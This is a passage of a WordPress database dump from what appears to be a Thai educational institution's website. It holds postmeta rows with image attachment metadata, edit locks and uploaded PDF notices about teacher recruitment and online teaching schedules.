ub-thumb\";a:4:{s:4:\"file\";s:21:\"160664-12-400x259.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:259;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28818, 11791, '_wp_attached_file', '2021/06/160664-14.jpg'),
(28819, 11791, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1049;s:6:\"height\";i:680;s:4:\"file\";s:21:\"2021/06/160664-14.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"160664-14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"160664-14-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"160664-14-768x498.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"160664-14-1024x664.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:664;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"160664-14-400x259.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:259;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28820, 11765, '_thumbnail_id', '11766'),
(28823, 11765, '_hide_featured', NULL),
(28826, 11793, '_edit_lock', '1623815258:14'),
(28827, 11793, '_edit_last', '14'),
(28828, 11794, '_wp_attached_file', '2021/06/160664-02-1.jpg'),
(28829, 11794, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1049;s:6:\"height\";i:680;s:4:\"file\";s:23:\"2021/06/160664-02-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"160664-02-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"160664-02-1-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"160664-02-1-768x498.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"160664-02-1-1024x664.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:664;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"160664-02-1-400x259.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:259;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28830, 11793, '_thumbnail_id', '11794'),
(28833, 11793, '_hide_featured', NULL),
(28836, 11796, '_edit_lock', '1623815644:14'),
(28837, 11796, '_edit_last', '14'),
(28838, 11797, '_wp_attached_file', '2021/06/cf2b9ce166cd50ebee27e74fdd342755_small.jfif_.jpg'),
(28839, 11797, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1049;s:6:\"height\";i:680;s:4:\"file\";s:56:\"2021/06/cf2b9ce166cd50ebee27e74fdd342755_small.jfif_.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:56:\"cf2b9ce166cd50ebee27e74fdd342755_small.jfif_-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:56:\"cf2b9ce166cd50ebee27e74fdd342755_small.jfif_-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:56:\"cf2b9ce166cd50ebee27e74fdd342755_small.jfif_-768x498.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:57:\"cf2b9ce166cd50ebee27e74fdd342755_small.jfif_-1024x664.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:664;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:56:\"cf2b9ce166cd50ebee27e74fdd342755_small.jfif_-400x259.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:259;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28840, 11796, '_thumbnail_id', '11797'),
(28843, 11796, '_hide_featured', NULL),
(28848, 11799, '_edit_lock', '1623815686:14'),
(28849, 11799, '_edit_last', '14'),
(28850, 11799, '_thumbnail_id', '11768'),
(28853, 11799, '_hide_featured', NULL),
(28858, 11801, '_edit_lock', '1623815721:14'),
(28859, 11801, '_edit_last', '14'),
(28860, 11801, '_thumbnail_id', '11769'),
(28863, 11801, '_hide_featured', NULL),
(28866, 11803, '_edit_lock', '1623815790:14'),
(28867, 11803, '_edit_last', '14'),
(28868, 11803, '_thumbnail_id', '11770'),
(28871, 11803, '_hide_featured', NULL),
(28874, 11805, '_edit_lock', '1623815867:14'),
(28875, 11805, '_edit_last', '14'),
(28876, 11805, '_thumbnail_id', '11771'),
(28879, 11805, '_hide_featured', NULL),
(28882, 11807, '_edit_lock', '1623815930:14'),
(28883, 11807, '_edit_last', '14'),
(28884, 11807, '_thumbnail_id', '11783'),
(28887, 11807, '_hide_featured', NULL),
(28890, 11809, '_edit_lock', '1623815968:14'),
(28891, 11809, '_edit_last', '14'),
(28892, 11809, '_thumbnail_id', '11784'),
(28895, 11809, '_hide_featured', NULL),
(28898, 11811, '_edit_lock', '1623816031:14'),
(28899, 11811, '_edit_last', '14'),
(28900, 11811, '_thumbnail_id', '11785'),
(28903, 11811, '_hide_featured', NULL),
(28906, 11813, '_edit_lock', '1623816089:14'),
(28907, 11813, '_edit_last', '14'),
(28908, 11813, '_thumbnail_id', '11786'),
(28911, 11813, '_hide_featured', NULL),
(28914, 11815, '_edit_lock', '1623816143:14'),
(28915, 11815, '_edit_last', '14'),
(28916, 11815, '_thumbnail_id', '11787'),
(28919, 11815, '_hide_featured', NULL),
(28922, 11817, '_edit_lock', '1623816201:14'),
(28923, 11817, '_edit_last', '14'),
(28924, 11817, '_thumbnail_id', '11790'),
(28927, 11817, '_hide_featured', NULL),
(28932, 11819, '_edit_lock', '1623816257:14'),
(28933, 11819, '_edit_last', '14'),
(28934, 11819, '_thumbnail_id', '11788'),
(28937, 11819, '_hide_featured', NULL),
(28942, 11821, '_edit_lock', '1623816311:14'),
(28943, 11821, '_edit_last', '14'),
(28944, 11821, '_thumbnail_id', '11791'),
(28947, 11821, '_hide_featured', NULL),
(28950, 11823, '_edit_lock', '1623816373:14'),
(28951, 11823, '_edit_last', '14'),
(28952, 11823, '_thumbnail_id', '11789'),
(28955, 11823, '_hide_featured', NULL),
(28958, 11825, '_edit_lock', '1623816645:14'),
(28959, 11825, '_edit_last', '14'),
(28960, 11826, '_wp_attached_file', '2021/06/160664-16.jpg'),
(28961, 11826, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1049;s:6:\"height\";i:680;s:4:\"file\";s:21:\"2021/06/160664-16.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"160664-16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"160664-16-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"160664-16-768x498.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"160664-16-1024x664.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:664;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"160664-16-400x259.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:259;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28962, 11825, '_thumbnail_id', '11826'),
(28965, 11825, '_hide_featured', NULL),
(28970, 11828, '_wp_attached_file', '2019/12/กรอบ.jpg'),
(28971, 11828, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1049;s:6:\"height\";i:680;s:4:\"file\";s:24:\"2019/12/กรอบ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"กรอบ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"กรอบ-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"กรอบ-768x498.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"กรอบ-1024x664.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:664;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"กรอบ-400x259.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:259;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28972, 11831, '_wp_attached_file', '2019/12/30396.jpg'),
(28973, 11831, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:608;s:4:\"file\";s:17:\"2019/12/30396.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"30396-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"30396-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"30396-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"30396-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"30396-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28974, 11834, '_edit_lock', '1623896451:14'),
(28975, 11834, '_edit_last', '14'),
(28976, 11835, '_wp_attached_file', '2021/06/รับสมัครครูจีน.pdf'),
(28979, 11834, '_hide_featured', NULL),
(28984, 11837, '_edit_lock', '1624008417:14'),
(28985, 11837, '_edit_last', '14'),
(28986, 11838, '_wp_attached_file', '2021/06/ประกาศครูช่างยนต์.pdf'),
(28989, 11837, '_hide_featured', NULL),
(28994, 11841, '_wp_attached_file', '2019/12/36011.jpg'),
(28995, 11841, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:608;s:4:\"file\";s:17:\"2019/12/36011.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"36011-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"36011-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"36011-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"36011-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"36011-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28996, 11843, '_edit_lock', '1624414163:14'),
(28997, 11843, '_edit_last', '14'),
(28998, 11844, '_wp_attached_file', '2021/06/ประกาศรับครูแผนก-ลจ._E.pdf'),
(29001, 11843, '_hide_featured', NULL),
(29006, 11846, '_wp_attached_file', '2019/12/36929.jpg'),
(29007, 11846, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:4:\"file\";s:17:\"2019/12/36929.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"36929-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"36929-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"36929-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"36929-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"36929-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29008, 11848, '_edit_lock', '1624420636:14'),
(29009, 11848, '_edit_last', '14'),
(29010, 11849, '_wp_attached_file', '2021/06/Untitled-1.jpg'),
(29011, 11849, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1772;s:6:\"height\";i:1181;s:4:\"file\";s:22:\"2021/06/Untitled-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-1-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-1-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29012, 11848, '_thumbnail_id', '11849'),
(29015, 11848, '_hide_featured', NULL),
(29018, 11852, '_wp_attached_file', '2019/12/ประเทศ.jpg'),
(29019, 11852, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:608;s:4:\"file\";s:30:\"2019/12/ประเทศ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"ประเทศ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"ประเทศ-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"ประเทศ-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"ประเทศ-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"ประเทศ-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29020, 11854, '_edit_lock', '1624524458:14'),
(29021, 11854, '_edit_last', '14'),
(29022, 11855, '_wp_attached_file', '2021/06/ประกาศกำหนดการสอนออนไลน์-1-2564-ถึง10กค.pdf'),
(29025, 11854, '_hide_featured', NULL),
(29036, 11857, '_wp_attached_file', '2021/06/ประกาศกำหนดการสอนออนไลน์-1-2564ถึง10กค.pdf'),
(29047, 11859, '_wp_attached_file', '2019/12/ประกาศกำหนดการสอนออนไลน์-1-2564ถึง10กค_pages-to-jpg-0001.jpg'),
(29048, 11859, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1222;s:6:\"height\";i:1264;s:4:\"file\";s:126:\"2019/12/ประกาศกำหนดการสอนออนไลน์-1-2564ถึง10กค_pages-to-jpg-0001.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:126:\"ประกาศกำหนดการสอนออนไลน์-1-2564ถึง10กค_pages-to-jpg-0001-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:126:\"ประกาศกำหนดการสอนออนไลน์-1-2564ถึง10กค_pages-to-jpg-0001-290x300.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:126:\"ประกาศกำหนดการสอนออนไลน์-1-2564ถึง10กค_pages-to-jpg-0001-768x794.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:794;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:127:\"ประกาศกำหนดการสอนออนไลน์-1-2564ถึง10กค_pages-to-jpg-0001-990x1024.jpg\";s:5:\"width\";i:990;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:126:\"ประกาศกำหนดการสอนออนไลน์-1-2564ถึง10กค_pages-to-jpg-0001-290x300.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1624549621\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(29049, 11862, '_wp_attached_file', '2021/06/รองชรินทร์.jpg'),
(29050, 11862, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1417;s:6:\"height\";i:1890;s:4:\"file\";s:42:\"2021/06/รองชรินทร์.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"รองชรินทร์-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"รองชรินทร์-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:43:\"รองชรินทร์-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:43:\"รองชรินทร์-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:42:\"รองชรินทร์-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29051, 11863, '_wp_attached_file', '2021/06/รองณัฐธารีย์.jpg'),
(29052, 11863, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1417;s:6:\"height\";i:1890;s:4:\"file\";s:48:\"2021/06/รองณัฐธารีย์.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"รองณัฐธารีย์-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"รองณัฐธารีย์-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"รองณัฐธารีย์-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:49:\"รองณัฐธารีย์-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:48:\"รองณัฐธารีย์-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29053, 11864, '_wp_attached_file', '2021/06/รองธานี.jpg'),
